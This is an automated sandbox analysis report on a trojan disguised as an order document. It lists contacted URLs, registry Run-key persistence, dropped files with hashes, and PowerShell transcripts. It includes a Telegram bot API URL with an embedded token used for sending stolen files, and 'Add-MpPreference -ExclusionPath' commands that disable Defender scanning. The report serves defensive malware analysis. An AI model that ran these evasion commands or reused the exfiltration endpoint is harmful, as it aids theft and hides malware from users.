https://api.ipify.org%GETMozilla/5.0 | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://DynDns.comDynDNS | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/ | #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument----- | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | - | high
http://YsLVkm.com | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp; svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp; svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp | false | - | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/ | svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | false | - | high

                              Contacted IPs


                              Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
(no public IPs contacted)

                              Private

                              IP
                              192.168.2.1

                              General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553020
Start date: 14.01.2022
Start time: 05:31:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: #NEW ORDER FOR JANUARY 2022.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 61
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@71/19@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 0.4% (good quality ratio 0.4%)
                              • Quality average: 82.1%
                              • Quality standard deviation: 20%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 248
                              • Number of non-executed functions: 10
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              Time     | Type            | Description
                              05:32:32 | API Interceptor | 309x Sleep call for process: powershell.exe modified
                              05:32:45 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:32:54 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:03 | Autostart       | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HPQOEAM - f "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              05:33:11 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:12 | API Interceptor | 414x Sleep call for process: aspnet_regbrowsers.exe modified
                              05:33:19 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:50 | API Interceptor | 7x Sleep call for process: svchost.exe modified
                              05:34:22 | API Interceptor | 62x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:true
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                              Process:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22180
                              Entropy (8bit):5.382395220506782
                              Encrypted:false
                              SSDEEP:384:JtCDD3Q3zwbTnNrnVsI1kt04mRdvOOhhrmFdObLAPaC:83QKlntqpIOgrKlf
                              MD5:868B45F63CEA63255972AF887177602C
                              SHA1:E6150AD0AF99DCCA5BA47E38B3917E89C53C2645
                              SHA-256:9576CBC5A5B034E5324ACFD21D2E51F7DF0D25D5D8B730AF1DF88C523632F704
                              SHA-512:925387EDFDC65E27BB93F5648F187D903427636DA16D0C990580EED3156CAB19646A90DC6658EDF2537FEB7B130BBBE457920885A1FD60F3833423FF9AA34D8A
                              Malicious:false
                              Reputation:unknown
                              Preview: @...e...........a.......u.|.........v...@.Z..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rnex2ek.lje.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uypqtat.42m.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2nywgzx.vdr.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj0etfuz.zra.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knth15sn.2xz.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndedftbp.hio.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pswme1px.15w.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qim5i45f.hre.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrcvsx0a.z50.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.8tzwXQ58.20220114053231.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.380010783427229
                              Encrypted:false
                              SSDEEP:96:BZNj2NGqDo1Z7FZfj2NGqDo1ZFqjA0cA0cA0OZh:Tccl
                              MD5:460D1EEA3318EA76817C22353BA78DB0
                              SHA1:220756D03DCA9F8D651664218C71A6D2B227C591
                              SHA-256:E4B62F2EE756CD8C5C7489423AB8E58127CF473AE16E1C8253FDAD9CA61507B2
                              SHA-512:B004764F490524ED9C3B4FC7A8E9F7C3F4C84F237FE0CCC52A1F5E5D2AD5EAA6F25F42B9891135F6302EBEB43238991EC3D0E8B4823FD07226C67FFB29730B98
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053232..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 6684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053232..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053450..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Cb2iz80h.20220114053303.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.416622514629973
                              Encrypted:false
                              SSDEEP:96:BZrj2NfPqDo1ZvGZQj2NfPqDo1Z1Ln9nznjZRj2NfPqDo1ZecnDnDnsrZCS:joS
                              MD5:6EB4BB056B4FD666EC578F830F7A24C1
                              SHA1:C948BD8B279111AB83F7EFE413F1AA094EF6EE76
                              SHA-256:6C8E95C381C59461EE046EEAF7E1397443A8B105C0E57925C8C3096579017309
                              SHA-512:9BF9099511FEA3FF254E15E2E6F9B7326055BEE64CD89C3B188AB2A9657E63CD571384AFDA41A44A442AFFC97780F6994B89FA4085B19A3437A73527C52C01F9
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053304..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 6008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053304..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053615.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Kmftd8NL.20220114053244.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.417647435012023
                              Encrypted:false
                              SSDEEP:96:BZMj2NfyqDo1ZwGZVj2NfyqDo1Z1Ln9nznjZZj2NfyqDo1ZDcnDnDnHZy:M
                              MD5:EDED91250DE1A455988D6274C5B9DCBB
                              SHA1:1F72A32B99A6720A6EC28C13AC110645BC3FFED9
                              SHA-256:1F3AE831C246CA98E7651A1615BF35127A008722AC3AD7618D7E7DBF78D70CDF
                              SHA-512:44FDD2EAB6993D00F5A3909B784893D72DB15CB67CF15B87A9BF07405A85BF9EC0950825FB455705E3D28F491E284FF5C80870CFBE7D381F8CFE145B77BE96C3
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053246..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053246..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053618.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.TjhCOvM7.20220114053243.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.419300447130754
                              Encrypted:false
                              SSDEEP:96:BZHj2Nf1qDo1ZDGZugj2Nf1qDo1ZJLn9nznjZoj2Nf1qDo1ZMcnDnDnaZB:Wc
                              MD5:1553878CE835BF07DFD49311CA17C5AE
                              SHA1:723A3D73B8645D924E55190C42C12F95EEF7568D
                              SHA-256:DC34A98A7FE67DC969F1D49C70BDE76A584FB76A048946D34D6D5E900E914027
                              SHA-512:2CCC216505C0D5D8D12441F425B5E212B728127438DB41900FACC35ADA8E4869E660E0AF922A4F12B53D15A8077EA0C96A0A98F918BB9960D3CE0E9B4D40F009
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053245..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053245..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053627.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.qPOtysNN.20220114053246.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.377594983509322
                              Encrypted:false
                              SSDEEP:96:BZij2NSqDo1ZMFZ5j2NSqDo1ZjqjA0cA0cA0reZVH:hccl
                              MD5:9B6113ADDFA0768FF34C25E0B1CB1532
                              SHA1:76048CA9695F3E41A457017B082C3B2A3EF36DB6
                              SHA-256:26D14F2938E1D6120DDD49F3A9CC599CFB1BD661841643D108AFE088798B0FF1
                              SHA-512:F2399B022F77E04FAD48BF84D4745ABBEC4E9608B3BD04C651901F90F4B046FB3C60246D725A0B30392DAA58B8FFE3949B52253C5A7E9AB1595C78E596ABC51E
                              Malicious:false
                              Reputation:unknown
